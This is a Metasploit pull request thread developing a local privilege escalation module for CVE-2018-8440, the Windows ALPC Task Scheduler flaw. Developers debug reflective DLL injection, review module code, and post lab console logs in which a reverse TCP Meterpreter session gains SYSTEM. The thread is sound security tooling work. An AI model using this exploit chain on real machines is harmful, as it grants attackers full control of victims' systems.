WIP: CVE 2018 8440 ALPC Scheduler
rapid7/metasploit-framework pull request #10643
Opened 2018-09-14 22:58 UTC by bwatters-r7

Please do not land... this does not work, yet

We managed to get the PoC playing nice, and I have code execution through the reflectivedll loader, but when I try and launch the function that contains the exploit, the reflective loader fails.  I have no idea why right now.

You can test it and see....  I have a test function that pops a messagebox.  That function is located in the same location as the exploit function.  I can call the test function fine, but Reflective Loading fails when I add a call to the exploit function.

As it is currently, you can run this module:
```
msf5 exploit(windows/local/alpc_taskscheduler) > show options

Module options (exploit/windows/local/alpc_taskscheduler):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   PATH                           no        Path to write the payload (%TEMP% by default).
   PAYLOAD_NAME                   no        The filename for the payload to be used on the target host if USE_INJECTION=false (%RAND%.exe by default).
   SESSION       1                yes       The session to run this module on.

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.135.111  yes       The listen address (an interface may be specified)
   LPORT     5464             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows x64

msf5 exploit(windows/local/alpc_taskscheduler) > run

[*] Started reverse TCP handler on 192.168.135.111:5464 
[*] Checking target...
[*] Attempting to PrivEsc on WIN10X64-1703 via session ID: 1
[*] Payload (5120 bytes) uploaded on WIN10X64-1703 to C:\Users\msfuser\AppData\Local\Temp\CBEaaBtrE.dll
[*] Target Looks Good... trying to start notepad
[*] Launching notepad to host the exploit...
[+] Process 1780 launched.
[*] Attempting to change the payload path to C:\Users\msfuser\AppData\Local\Temp\CBEaaBtrE.dll...
[*] payload path length = 49...
[*] original path length = 84...
[*] Reflectively injecting the exploit DLL into 1780...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/alpc_taskscheduler) > 

```
On the target machine, we get the messagebox:
![image](https://user-images.githubusercontent.com/17987018/45578416-fe642e80-b846-11e8-978a-50bcdd19124c.png)

If I uncomment the call to the exploit function in the test function, Reflective Injection fails with this:
```
msf5 exploit(windows/local/alpc_taskscheduler) > run

[*] Started reverse TCP handler on 192.168.135.111:5464 
[*] Checking target...
[*] Attempting to PrivEsc on WIN10X64-1703 via session ID: 1
[*] Payload (5120 bytes) uploaded on WIN10X64-1703 to C:\Users\msfuser\AppData\Local\Temp\QwgpTmXoCj.dll
[*] Target Looks Good... trying to start notepad
[*] Launching notepad to host the exploit...
[+] Process 2360 launched.
[*] Attempting to change the payload path to C:\Users\msfuser\AppData\Local\Temp\QwgpTmXoCj.dll...
[*] payload path length = 50...
[*] original path length = 84...
[*] Reflectively injecting the exploit DLL into 2360...
[-] Exploit failed: Rex::PeParsey::PeParseyError Cannot find rva! 1735288172
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/alpc_taskscheduler) > 

```

I've been looking at it too long, so if anyone (cough @OJ @bcook @jrobles-r7 @asoto-r7) can see what I'm screwing up, please tell me.

2018-09-14 23:33 UTC, OJ commented
Nice work mate. I'll have a look either tonight or tomorrow night. Got a
climbing comp on this weekend ;)

On Sat., 15 Sep. 2018, 08:58 Brendan, <notifications@github.com> wrote:

> Please do not land... this does not work, yet
>
> We managed to get the PoC playing nice, and I have code execution through
> the reflectivedll loader, but when I try and launch the function that
> contains the exploit, the reflective loader fails. I have no idea why right
> now.
>
> You can test it and see.... I have a test function that pops a messagebox.
> That function is located in the same location as the exploit function. I
> can call the test function fine, but Reflective Loading fails when I add a
> call to the exploit function.
>
> As it is currently, you can run this module:
>
> msf5 exploit(windows/local/alpc_taskscheduler) > show options
>
> Module options (exploit/windows/local/alpc_taskscheduler):
>
>    Name          Current Setting  Required  Description
>    ----          ---------------  --------  -----------
>    PATH                           no        Path to write the payload (%TEMP% by default).
>    PAYLOAD_NAME                   no        The filename for the payload to be used on the target host if USE_INJECTION=false (%RAND%.exe by default).
>    SESSION       1                yes       The session to run this module on.
>
>
> Payload options (windows/x64/meterpreter/reverse_tcp):
>
>    Name      Current Setting  Required  Description
>    ----      ---------------  --------  -----------
>    EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
>    LHOST     192.168.135.111  yes       The listen address (an interface may be specified)
>    LPORT     5464             yes       The listen port
>
>
> Exploit target:
>
>    Id  Name
>    --  ----
>    0   Windows x64
>
>
> msf5 exploit(windows/local/alpc_taskscheduler) > run
>
> [*] Started reverse TCP handler on 192.168.135.111:5464
> [*] Checking target...
> [*] Attempting to PrivEsc on WIN10X64-1703 via session ID: 1
> [*] Payload (5120 bytes) uploaded on WIN10X64-1703 to C:\Users\msfuser\AppData\Local\Temp\CBEaaBtrE.dll
> [*] Target Looks Good... trying to start notepad
> [*] Launching notepad to host the exploit...
> [+] Process 1780 launched.
> [*] Attempting to change the payload path to C:\Users\msfuser\AppData\Local\Temp\CBEaaBtrE.dll...
> [*] payload path length = 49...
> [*] original path length = 84...
> [*] Reflectively injecting the exploit DLL into 1780...
> [+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
> [*] Exploit completed, but no session was created.
> msf5 exploit(windows/local/alpc_taskscheduler) >
>
>
> On the target machine, we get the messagebox:
> [image: image]
> <https://user-images.githubusercontent.com/17987018/45578416-fe642e80-b846-11e8-978a-50bcdd19124c.png>
>
> If I uncomment the call to the exploit function in the test function,
> Reflective Injection fails with this:
>
> msf5 exploit(windows/local/alpc_taskscheduler) > run
>
> [*] Started reverse TCP handler on 192.168.135.111:5464
> [*] Checking target...
> [*] Attempting to PrivEsc on WIN10X64-1703 via session ID: 1
> [*] Payload (5120 bytes) uploaded on WIN10X64-1703 to C:\Users\msfuser\AppData\Local\Temp\QwgpTmXoCj.dll
> [*] Target Looks Good... trying to start notepad
> [*] Launching notepad to host the exploit...
> [+] Process 2360 launched.
> [*] Attempting to change the payload path to C:\Users\msfuser\AppData\Local\Temp\QwgpTmXoCj.dll...
> [*] payload path length = 50...
> [*] original path length = 84...
> [*] Reflectively injecting the exploit DLL into 2360...
> [-] Exploit failed: Rex::PeParsey::PeParseyError Cannot find rva! 1735288172
> [*] Exploit completed, but no session was created.
> msf5 exploit(windows/local/alpc_taskscheduler) >
>
>
> I've been looking at it too long, so if anyone (cough @OJ
> <https://github.com/OJ> @bcook <https://github.com/bcook> @jrobles-r7
> <https://github.com/jrobles-r7> @asoto-r7 <https://github.com/asoto-r7>)
> can see what I'm screwing up, please tell me.
> ------------------------------
> You can view, comment on, or merge this pull request online at:
>
>   https://github.com/rapid7/metasploit-framework/pull/10643
> Commit Summary
>
>    - WIP: Initial CVE-2018-8440 / ALPC-TaskSched-LPE
>    - Redo dllinjection
>
> File Changes
>
>    - *A* data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.dll
>    <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-0>
>    (0)
>    - *A* data/exploits/CVE-2018-8440/ALPC_TaskSched.exp
>    <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-1>
>    (0)
>    - *A* data/exploits/CVE-2018-8440/ALPC_TaskSched.lib
>    <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-2>
>    (0)
>    - *A* data/exploits/CVE-2018-8440/ALPC_TaskSched.pdb
>    <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-3>
>    (0)
>    - *A* data/exploits/CVE-2018-8440/reflective_dll.x64.dll
>    <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-4>
>    (0)
>    - *A* external/source/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.dll
>    <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-5>
>    (0)
>    - *A*
>    external/source/exploits/CVE-2018-8440/ALPC-TaskSched-LPE/ALPC-TaskSched-LPE.filters
>    <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-6>
>    (55)
>    - *A*
>    external/source/exploits/CVE-2018-8440/ALPC-TaskSched-LPE/ALPC-TaskSched-LPE.vcxproj
>    <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-7>
>    (178)
>    - *A*
>    external/source/exploits/CVE-2018-8440/ALPC-TaskSched-LPE/ClassDiagram.cd
>    <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-8>
>    (2)
>    - *A*
>    external/source/exploits/CVE-2018-8440/ALPC-TaskSched-LPE/Resource.aps
>    <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-9>
>    (0)
>    - *A*
>    external/source/exploits/CVE-2018-8440/ALPC-TaskSched-LPE/Resource.rc
>    <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-10>
>    (0)
>    - *A*
>    external/source/exploits/CVE-2018-8440/ALPC-TaskSched-LPE/dllmain.cpp
>    <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-11>
>    (37)
>    - *A* external/source/exploits/CVE-2018-8440/ALPC-TaskSched-LPE/rpc.idl
>    <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-12>
>    (166)
>    - *A*
>    external/source/exploits/CVE-2018-8440/ALPC-TaskSched-LPE/stdafx.cpp
>    <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-13>
>    (8)
>    - *A*
>    external/source/exploits/CVE-2018-8440/ALPC-TaskSched-LPE/~AutoRecover.ALPC-TaskSched-LPE.vcxproj
>    <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-14>
>    (179)
>    - *A*
>    external/source/exploits/CVE-2018-8440/common/ReflectiveDLLInjection.h
>    <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-15>
>    (53)
>    - *A* external/source/exploits/CVE-2018-8440/dll/reflective_dll.vcxproj
>    <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-16>
>    (269)
>    - *A*
>    external/source/exploits/CVE-2018-8440/dll/reflective_dll.vcxproj.filters
>    <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-17>
>    (53)
>    - *A* external/source/exploits/CVE-2018-8440/dll/src/Exploit.cpp
>    <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-18>
>    (208)
>    - *A* external/source/exploits/CVE-2018-8440/dll/src/Hardlink.cpp
>    <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-19>
>    (107)
>    - *A* external/source/exploits/CVE-2018-8440/dll/src/ReflectiveDll.c
>    <https://github.com/rapid7/metasploit-framework/pull/10643/files#diff-20>
>    (35)
>    - *A* external/source/exploits/CVE-2018-8440/dll/src/ReflectiveLoader.c
>    <https://github. [...]

2018-09-17 17:07 UTC, jrobles-r7 commented
I was able to get this working locally with Reflective DLL Injection. I have a few hardcoded paths in the module and one in the solution for testing that I need to fix, along with some other things. I'll have the changes up sometime today or tomorrow.

2018-09-17 22:50 UTC, jrobles-r7 commented
```
msf5 exploit(windows/local/alpc_taskscheduler) > sessions

Active sessions
===============

  Id  Name  Type                     Information                               Connection
  --  ----  ----                     -----------                               ----------
  1         meterpreter x64/windows  DESKTOP-IPOGIJR\msfdev @ DESKTOP-IPOGIJR  172.22.222.243:4444 -> 172.22.222.200:50490 (172.22.222.200)

msf5 exploit(windows/local/alpc_taskscheduler) > run

[*] Started reverse TCP handler on 172.22.222.243:4444 
[*] Checking target...
[*] Attempting to PrivEsc on DESKTOP-IPOGIJR via session ID: 1
[*] Payload (5120 bytes) uploaded on DESKTOP-IPOGIJR to C:\Users\msfdev\AppData\Local\Temp\lbNjsaazXMT.dll
[*] Target Looks Good... trying to start notepad
[*] Launching notepad to host the exploit...
[+] Process 3768 launched.
[*] Attempting to change the payload path to C:\Users\msfdev\AppData\Local\Temp\lbNjsaazXMT.dll...
[*] Reflectively injecting the exploit DLL into 3768...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (206403 bytes) to 172.22.222.200
[*] Meterpreter session 2 opened (172.22.222.243:4444 -> 172.22.222.200:50491) at 2018-09-17 17:37:07 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-IPOGIJR
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter >
```

2018-09-17 22:52 UTC, OJ commented
Looking good! Nice work folks. I'm going to give this a once-over so brace yourself for a bunch of comments that you probably already know about :)

2018-09-17 23:06 UTC, OJ requested changes
I think this is looking good. We could probably do away with the instance-level variables in the module as well, as I've been bitten by mixin issues with variable name clashes in the past. That's just personal preference.

Thanks again for the work so far!

2018-09-17 23:06 UTC, OJ commented on modules/exploits/windows/local/alpc_taskscheduler.rb
> +          ['Windows x64', { 'Arch' => ARCH_X64 }]
From my original testing I wasn't able to get this method working on Windows 7 (though I admit to not trying very hard). Pretty sure we can get it to work though. Have you had the chance to test it on something other than Windows 10?

2018-09-17 23:06 UTC, OJ commented on modules/exploits/windows/local/alpc_taskscheduler.rb
> +      notepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true)
This is a comment for basically all our Windows LPE exploits (not just this one):

Would it be worth considering making the target process customisable? Default to `notepad.exe` but allow the user to configure their own option?

2018-09-17 23:06 UTC, OJ commented on modules/exploits/windows/local/alpc_taskscheduler.rb
> +    exploit_data.force_encoding(original_encoding)
I reckon we can do away with this if we just go ahead and copy the binary into the target process's memory so that it can be copied from there instead. Thoughts?

Happy to PR that to this branch if you think it's useful.

2018-09-17 23:06 UTC, OJ commented on modules/exploits/windows/local/alpc_taskscheduler.rb
> +  def validate_target
Should this instead be the `check` method that makes sure the target OS/version/arch is supported?

2018-09-18 13:56 UTC, jrobles-r7 commented on external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/ALPC-TaskSched-LPE.cpp
> +	HANDLE hPayload = ::CreateFile(L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
That does make sense. I was wondering if there was an easy way to do that. Could you point me to an example of that so I can reference it?

2018-09-18 13:57 UTC, jrobles-r7 commented on modules/exploits/windows/local/alpc_taskscheduler.rb
> +          ['Windows x64', { 'Arch' => ARCH_X64 }]
I just tested Windows 7 and it wasn't working. I'll see if I can fix that.

2018-09-18 13:58 UTC, jrobles-r7 commented on modules/exploits/windows/local/alpc_taskscheduler.rb
> +      notepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true)
I'll add that as an option.

2018-09-18 13:59 UTC, jrobles-r7 commented on modules/exploits/windows/local/alpc_taskscheduler.rb
> +    exploit_data.force_encoding(original_encoding)
If we don't write anything to disk until we have to that would be great and getting rid of modifying the dll on the metasploit side would be nice.

2018-09-18 14:01 UTC, bwatters-r7 commented on external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/ALPC-TaskSched-LPE.cpp
> +	HANDLE hPayload = ::CreateFile(L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
I love it.  I figure we inject executable code, data should be even easier.

2018-09-18 14:02 UTC, jrobles-r7 commented on modules/exploits/windows/local/alpc_taskscheduler.rb
> +  def validate_target
A `check` method can be added.

2018-09-18 22:05 UTC, SharpMan commented on external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/ALPC-TaskSched-LPE.cpp
> +	hFind = FindFirstFile(L"C:\\Windows\\System32\\DriverStore\\FileRepository\\prnms003.inf_amd64*", &FindFileData);
Right, Window is not chosen to be always mount on the C drive...

2018-09-18 22:07 UTC, SharpMan commented on modules/exploits/windows/local/alpc_taskscheduler.rb
> +          ['Windows x64', { 'Arch' => ARCH_X64 }]
It does work on Windows server 2012 & I assume it makes senses that it won't run on Windows 7 32bit

2018-09-20 01:28 UTC, OJ commented on modules/exploits/windows/local/alpc_taskscheduler.rb
> +    exploit_data.force_encoding(original_encoding)
Cool, apologies for not digging up an example. I was thinking just allocated a block of memory in the target and write the payload length and the payload to it. Pass that memory pointer as an argument to the exploit and off it goes.

2018-09-20 02:26 UTC, jrobles-r7 commented
```
msf5 exploit(windows/local/alpc_taskscheduler) > run

[*] Started reverse TCP handler on 172.22.222.253:4444 
[*] Checking target...
[*] Attempting to PrivEsc on DESKTOP-IPOGIJR via session ID: 1
[*] Target Looks Good... trying to start notepad.exe
[*] Launching notepad.exe to host the exploit...
[+] Process 10200 launched.
[*] Writing payload dll into process 10200 memory
[*] Reflectively injecting the exploit DLL into 10200...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (206403 bytes) to 172.22.222.200
[*] Meterpreter session 2 opened (172.22.222.253:4444 -> 172.22.222.200:50491) at 2018-09-19 21:23:47 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-IPOGIJR
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x64/windows
meterpreter >
```

2018-09-20 09:16 UTC, wvu-r7 commented on modules/exploits/windows/local/alpc_taskscheduler.rb
> +      notepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true)
Funny, we had been discussing that when I brought up your `ms10_015_kitrap0d`. :)

2018-09-20 09:18 UTC, wvu-r7 commented on modules/exploits/windows/local/alpc_taskscheduler.rb
> +    exploit_data.force_encoding(original_encoding)
Nice work! Much better than writing an additional DLL.

2018-09-20 09:19 UTC, wvu-r7 commented on modules/exploits/windows/local/alpc_taskscheduler.rb
> +    exploit_data.force_encoding(original_encoding)
Nice work! Much better than writing an additional DLL to disk.

2018-09-21 06:42 UTC, bcoles commented
I couldn't help but notice this bug does not have a logo.

I suggest something alpaca themed. Perhaps with a timepiece.

I offer:

![ALPaCa Scheduler](https://user-images.githubusercontent.com/434827/45864366-24488080-bdbd-11e8-878e-815a05a98e84.png)

Source images stolen from:
* http://getdrawings.com/cartoon-llama-drawing#cartoon-llama-drawing-64.jpg
* https://images-na.ssl-images-amazon.com/images/I/71TvPKvWhaL._UY550_.jpg

2018-09-21 13:43 UTC, bcoles commented on modules/exploits/windows/local/alpc_taskscheduler.rb
> +  def validate_active_host
This method will die horribly on shell sessions. `sysinfo` calls will raise ```undefined method `[]' for nil:NilClass``` on non-Meterpreter sessions. The two exceptions specifically being rescued won't rescue this error, resulting in a confusing and seemingly unrelated error message.

2018-09-21 13:43 UTC, bcoles commented on modules/exploits/windows/local/alpc_taskscheduler.rb
> +  def validate_target
```ruby
    if is_system?                                                                                               
      fail_with(Failure::None, 'Session is already elevated')
    end
```

2018-09-21 13:43 UTC, bcoles commented on modules/exploits/windows/local/alpc_taskscheduler.rb
> +    begin
Golfed for rescue-from-method style:

```
  def validate_active_host
    sysinfo['Computer']
    true
  rescue Rex::Post::Meterpreter::RequestError, Rex::TimeoutError => e
    elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
    false
  end
```

2018-09-21 13:43 UTC, bcoles commented on modules/exploits/windows/local/alpc_taskscheduler.rb
> +    begin
Golfed for rescue-from-method style:

```
  def exploit
    payload_dll = generate_payload_dll
    process_name = datastore['PROCESS'] || 'notepad.exe'

    print_status('Checking target...')
    unless validate_active_host
      raise Msf::Exploit::Failed, 'Could not connect to session'
    end

    validate_target
    print_status("Target Looks Good... trying to start #{process_name}")
    process = setup_process(process_name)
    inject_magic(process, payload_dll)
    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
  rescue Rex::Post::Meterpreter::RequestError => e
    elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
    print_error(e.message)
  end
```

2018-09-21 13:43 UTC, bcoles commented on modules/exploits/windows/local/alpc_taskscheduler.rb
> +          'DisablePayloadHandler' => false
Why bother?

2018-09-21 13:46 UTC, jrobles-r7 commented on modules/exploits/windows/local/alpc_taskscheduler.rb
> +  def validate_target
https://github.com/jrobles-r7/metasploit-framework/commit/39128df869fcda607e7e031478385117e9349d79
I was going to try checking for installed hotfix ids but there are a lot and I'm not sure how to pull the info I need from meterpreter, specifically Win10 releases/version? (1607, 1703, 1709, 1803). [Some of the hotfix ids also depend on Security Updates vs Monthly Rollout](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8440). 
I linked to a check example for this module in my repo. Any suggestions? 
@OJ @bcoles

2018-09-21 17:44 UTC, jrobles-r7 commented
```
msf5 > use exploit/windows/local/alpc_taskscheduler
msf5 exploit(windows/local/alpc_taskscheduler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/alpc_taskscheduler) > set lhost 172.22.222.136 
lhost => 172.22.222.136
msf5 exploit(windows/local/alpc_taskscheduler) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                                                       Connection
  --  ----  ----                     -----------                                                                       ----------
  1         shell x64/windows        Microsoft Windows [Version 10.0.17134.228] (c) 2018 Microsoft Corporation. Al...  172.22.222.136:4444 -> 172.22.222.200:50490 (172.22.222.200)
  2         meterpreter x64/windows  DESKTOP-IPOGIJR\lowmsfdev @ DESKTOP-IPOGIJR                                       172.22.222.136:4444 -> 172.22.222.200:50491 (172.22.222.200)

msf5 exploit(windows/local/alpc_taskscheduler) > set session 1
session => 1
msf5 exploit(windows/local/alpc_taskscheduler) > exploit

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.22.222.136:4444 
[-] Exploit aborted due to failure: none: Only meterpreter sessions are supported
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/alpc_taskscheduler) > set session 2
session => 2
msf5 exploit(windows/local/alpc_taskscheduler) > exploit

[*] Started reverse TCP handler on 172.22.222.136:4444 
[*] Checking target...
[*] Target Looks Good... trying to start notepad.exe
[*] Launching notepad.exe to host the exploit...
[+] Process 6140 launched.
[*] Writing payload dll into process 6140 memory
[*] Reflectively injecting the exploit DLL into 6140...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (206403 bytes) to 172.22.222.200
[*] Meterpreter session 3 opened (172.22.222.136:4444 -> 172.22.222.200:50492) at 2018-09-21 12:28:00 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-IPOGIJR
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x64/windows
meterpreter > background
[*] Backgrounding session 3...
msf5 exploit(windows/local/alpc_taskscheduler) > set session 3
session => 3
msf5 exploit(windows/local/alpc_taskscheduler) > exploit

[*] Started reverse TCP handler on 172.22.222.136:4444 
[*] Checking target...
[-] Exploit aborted due to failure: none: Session is already elevated
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/alpc_taskscheduler) >
```

2018-09-21 20:40 UTC, merged

2018-09-21 20:45 UTC, wvu-r7 commented
:cake:

2018-09-21 20:54 UTC, bwatters-r7 commented
Testing Results:
![image](https://user-images.githubusercontent.com/17987018/45905609-936ea680-bdb6-11e8-9039-0132e67ed8e6.png)

2018-09-21 20:55 UTC, bwatters-r7 commented
Release Notes:
This adds a local privilege escalation exploit for Windows 8 and later targeting the Windows ALPC scheduler.